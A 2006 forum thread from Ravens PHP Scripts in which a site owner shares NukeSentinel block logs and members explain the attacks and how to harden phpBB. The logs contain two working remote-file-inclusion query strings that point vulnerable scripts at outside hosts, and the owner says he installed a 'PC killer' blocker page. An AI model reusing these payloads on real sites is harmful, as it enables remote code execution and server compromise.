Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.5.x
Author Message
death_dream
Hangin' Around



Joined: Aug 10, 2006
Posts: 38

PostPosted: Mon Aug 14, 2006 3:07 am Reply with quote

Its been two days now since I installed Nuke Sentinel on my site and its already cought one guy. Very Happy

This is what the email said:
Code:
Date & Time: 2006-08-13 22:59:25 NDT GMT -0230

Blocked IP: 85.98.82.217
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: ddream.hostingposts.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Get String: ddream.hostingposts.com/index.php?_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Post String: ddream.hostingposts.com/index.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.82.217
Remote Port: 12876
Request Method: GET


What was he trying to do?

~Death Dream~
 
View user's profile Send private message Visit poster's website
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Mon Aug 14, 2006 7:09 am Reply with quote

Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! :clap:

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Aug 14, 2006 9:22 am Reply with quote

It seems to be an attack against Mambo or Joomla systems. Probably a hacking robot script.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
death_dream







PostPosted: Mon Aug 14, 2006 9:49 am Reply with quote

montego wrote:
Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! :clap:


:clap: even if you tried to the url you would get banned right?

~Death Dream~
 
montego







PostPosted: Mon Aug 14, 2006 7:25 pm Reply with quote

I don't mean trying out the URL on my own site... Wink What I meant was to try and download what this joker is trying to do in the embedded URI.
 
death_dream







PostPosted: Tue Aug 15, 2006 2:32 am Reply with quote

I see.

~Death Dream~
 
death_dream







PostPosted: Tue Aug 15, 2006 6:44 am Reply with quote

Got 2!

Code:
Date & Time: 2006-08-15 08:20:40 NDT GMT -0230

Blocked IP: 86.107.102.26
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Get String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Post String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 86.107.102.26
Remote Port: 2062
Request Method: GET


Any idea on this one?
 
gregexp
The Mouse Is Extension Of Arm



Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Tue Aug 15, 2006 9:19 am Reply with quote

phpbb root path exploit.
sentinel stops these and its doing its job.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
death_dream







PostPosted: Tue Aug 15, 2006 11:32 am Reply with quote

Excellent. Should I update my phpbb then as well? I'm using 2.0.18

~Death Dream~
 
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6432

PostPosted: Tue Aug 15, 2006 3:42 pm Reply with quote

First, put admin authentication on the modules/Forums/admin directory. 2.0.19 is good, but there is some debate about 2.0.20.

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
View user's profile Send private message
death_dream







PostPosted: Wed Aug 16, 2006 2:54 am Reply with quote

K I will put admin authentication on. But could you tell me how it works before I find my self to the point that I can't log in lol.

Also I put block proxies on strong level, So what does "Default Page" mean?

~Death Dream~
 
montego







PostPosted: Wed Aug 16, 2006 6:51 am Reply with quote

Quote:

Also I put block proxies on strong level, So what does "Default Page" mean?

It simply means that when the attack is caught, it will display the default blocker page that came with NS... NS allows you to create your own if you would rather not use what is provided. However, I kind of like the "in your face" page that is provided... Laughing
 
death_dream







PostPosted: Wed Aug 16, 2006 7:59 am Reply with quote

I installed PC killer on it.

~Death Dream~
 
montego







PostPosted: Thu Aug 17, 2006 5:31 am Reply with quote

Well, that is far more "in your face" than the default blocker pages. ROTFL
 
death_dream







PostPosted: Thu Aug 17, 2006 6:04 am Reply with quote

montego wrote:
Well, that is far more "in your face" than the default blocker pages. ROTFL


Thats what I want Very Happy

~Death Dream~
 
utssace
Worker
Worker



Joined: Feb 18, 2006
Posts: 155
Location: Virginia

PostPosted: Tue Aug 22, 2006 5:16 pm Reply with quote

How do you turn on admin authentication for the forum. I have it turned on for admin access to the site (config.php).
 
View user's profile Send private message Visit poster's website
montego







PostPosted: Wed Aug 23, 2006 7:05 am Reply with quote

It is not a NukeSentinel thing. See this:
[ Only registered users can see links on this board! Get registered or login! ]
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.5.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©